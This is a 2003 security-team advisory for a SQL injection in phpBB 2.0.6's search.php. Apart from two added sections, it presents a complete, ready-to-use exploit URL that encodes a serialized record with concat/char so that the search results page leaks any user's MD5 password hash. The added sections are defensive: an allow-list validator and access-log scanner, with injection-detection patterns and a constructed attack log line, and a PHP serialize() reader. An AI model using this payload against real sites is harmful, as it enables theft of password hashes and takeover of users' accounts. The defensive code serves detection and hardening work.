phpBB v2.06 search_id sql injection exploit
Source: Hat-Squad.com  Author: service  Published: 2003-12-01


-Hat-Squad Security Team-

Using the query below you get the MD5 password hash of user [uid]; it comes back as the
[highlight] variable of the viewtopic.php links on the search results page. (Works with MySQL > 4.)


http://site.com/search.php?search_id=1%20union%20select%20concat(char
(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108
,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95
,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,1
15,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,1
15,58,51,50,58,34),user_password,char
(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,5
6,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,1
15,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54
,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,9
5,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%
20user_id=[uid]/*

Details:

phpBB stores the search records in serialized format in the php_search_result
table. In our case, when search_id is not one of the special values ('newposts',
'egosearch', 'unanswered'), the following routine is run:

// code snippet from search.php

$search_id = intval($search_id);
if ( $search_id )
{
    $sql = "SELECT search_array
        FROM " . SEARCH_TABLE . "
        WHERE search_id = $search_id
            AND session_id = '" . $userdata['session_id'] . "'";
    if ( !($result = $db->sql_query($sql)) )
    {
        // ... (error handling)

As you can see, intval($search_id) is not safe here, so the first idea would be:

search_id=1 union select user_password from phpbb_users where user_id=[uid] /*

The trailing /* comments out the rest of the SQL string
(AND session_id = '" . $userdata['session_id'] . "').
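An added example, not from the original advisory: the allow-list check that a hardened search.php should apply to search_id before it reaches SQL, and the same check run over constructed access-log lines to flag requests that fail it. The /phpBB2/ path and the log lines are assumed and constructed.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# search.php treats these names specially; any other search_id must be a bare integer.
SPECIAL_SEARCH_IDS = {"newposts", "egosearch", "unanswered"}
# Tokens that never belong in an integer search_id (the page's payload uses all of them).
INJECTION_TOKENS = re.compile(r"union|select|concat|char\s*\(|/\*|--", re.I)

def is_valid_search_id(value):
    """Allow-list check a hardened search.php should apply before building SQL."""
    return value in SPECIAL_SEARCH_IDS or value.isdigit()

def classify_request(target):
    """'sqli' / 'invalid' for a suspicious search.php request target, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/search.php"):
        return None
    sid = parse_qs(parts.query, keep_blank_values=True).get("search_id")
    if sid is None:
        return None
    raw = unquote_plus(sid[0])  # second decode catches double-encoded values
    if is_valid_search_id(raw):
        return None
    return "sqli" if INJECTION_TOKENS.search(raw) else "invalid"

# Constructed Apache-style log lines (assumed install path /phpBB2/, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Dec/2003:10:00:00 +0000] "GET /phpBB2/search.php?search_id=newposts HTTP/1.1" 200 5123
10.0.0.5 - - [01/Dec/2003:10:00:01 +0000] "GET /phpBB2/search.php?search_id=1234 HTTP/1.1" 200 8811
10.0.0.9 - - [01/Dec/2003:10:00:02 +0000] "GET /phpBB2/search.php?search_id=1%20union%20select%20user_password%20from%20phpbb_users%20where%20user_id=2/* HTTP/1.1" 200 9020
10.0.0.9 - - [01/Dec/2003:10:00:03 +0000] "GET /phpBB2/viewtopic.php?t=5 HTTP/1.1" 200 4100
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_log(text):
    """Return (client_ip, verdict, request_target) for each suspicious search.php hit."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ip, target = m.groups()
            verdict = classify_request(target)
            if verdict:
                hits.append((ip, verdict, target))
    return hits
```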

But if you run this query you get nothing useful. Looking at the rest of the code
in search.php, we find:

// code snippet from search.php

        $search_data = unserialize($row['search_array']);
        for($i = 0; $i < count($store_vars); $i++)
        {
            // each name in $store_vars becomes a global ($search_results, $split_search, ...)
            $$store_vars[$i] = $search_data[$store_vars[$i]];
        }
    }
}
}

//
// Look up data ...
//
if ( $search_results != '' )
{
    // run the search queries on the post ids, ... then DISPLAY the results (and our requested password ;)
}


Feeding our query to this code, $row['search_array'] will contain the MD5 hash of the
user's password. BUT remember: it MUST be in serialized format to be accepted by the rest of
the code responsible for DISPLAYING result sets, so we must build a query that returns the
PASSWORD HASH in the form of serialized variables (to learn more about the serialize() and
unserialize() functions, see the PHP manual).

A simple serialized array holding one string, "test", is stored like this:

a:1:{s:0:"";s:4:"test";}

A serialized result set in search.php has this format:

a:7:{s:14:"search_results";s:28:"5184,,5538,,5721,,5776,,5979";s:17:"total_match_count";i:5;s:12:"split_search";a:1:{i:0;s:8:"aaaaaa";}s:7:"sort_by";i:0;s:8:"sort_dir";s:4:"DESC";s:12:"show_results";s:6:"topics";s:12:"return_chars";i:200;}

We will place user_password as the split_search value instead of "aaaaaa", using MySQL's
concat() and char() functions with the ASCII codes of the serialized object above:

concat(char
(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108
,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95
,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,1
15,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,1
15,58,51,50,58,34),user_password,char
(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,5
6,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,1
15,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54
,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,9
5,99,104,97,114,115,34,59,105,58,50,48,48,59,125))


and the final query would be:
http://site.com/search.php?search_id=1%20union%20select%20concat(char
(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108
,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95
,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,1
15,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,1
15,58,51,50,58,34),user_password,char
(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,5
6,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,1
15,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54
,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,9
5,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%
20user_id=[id]/*
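An added example, not phpBB's own code: a small reader for the subset of PHP serialize() that search_array uses (i, s, a), together with a mirror of the $store_vars loop shown earlier. It makes the point the construction above depends on: the record is only accepted when every declared length matches its data exactly, which is why the hash slot had to be declared s:32. The sample record is constructed from the format shown above, with the "aaaaaa" length corrected to 6 so that it parses.

```python
# Reader for the subset of PHP serialize() used by search_array: i (int), s (string), a (array).
# Added example, not phpBB's code; lengths are treated as character counts (fine for ASCII).
def php_unserialize(data):
    value, pos = _read(data, 0)
    if pos != len(data):
        raise ValueError("trailing data at offset %d" % pos)
    return value

def _read(data, pos):
    kind = data[pos]
    if kind == "i":                                   # i:<int>;
        end = data.index(";", pos)
        return int(data[pos + 2:end]), end + 1
    if kind == "s":                                   # s:<len>:"<text>";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                             # skip :"
        if data[start + length:start + length + 2] != '";':
            raise ValueError("declared length %d does not match data at offset %d" % (length, pos))
        return data[start:start + length], start + length + 2
    if kind == "a":                                   # a:<count>:{<key><value>...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        pos, out = colon + 2, {}                      # skip :{
        for _ in range(count):
            key, pos = _read(data, pos)
            out[key], pos = _read(data, pos)
        if data[pos] != "}":
            raise ValueError("unterminated array at offset %d" % pos)
        return out, pos + 1
    raise ValueError("unsupported type %r at offset %d" % (kind, pos))

# The names search.php copies out of the record into globals ($search_results, ...).
STORE_VARS = ["search_results", "total_match_count", "split_search",
              "sort_by", "sort_dir", "show_results", "return_chars"]

def load_search_vars(search_array):
    """Mirror the $$store_vars[$i] = $search_data[$store_vars[$i]] loop."""
    record = php_unserialize(search_array)
    return {name: record.get(name) for name in STORE_VARS}

# Constructed record in the layout shown above (split_search length corrected to 6).
SAMPLE_SEARCH_ARRAY = (
    'a:7:{s:14:"search_results";s:28:"5184,,5538,,5721,,5776,,5979";'
    's:17:"total_match_count";i:5;s:12:"split_search";a:1:{i:0;s:6:"aaaaaa";}'
    's:7:"sort_by";i:0;s:8:"sort_dir";s:4:"DESC";s:12:"show_results";s:6:"topics";'
    's:12:"return_chars";i:200;}'
)
```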

Hat-Squad Security Team,
contact: service[at]Hat-Squad.com



 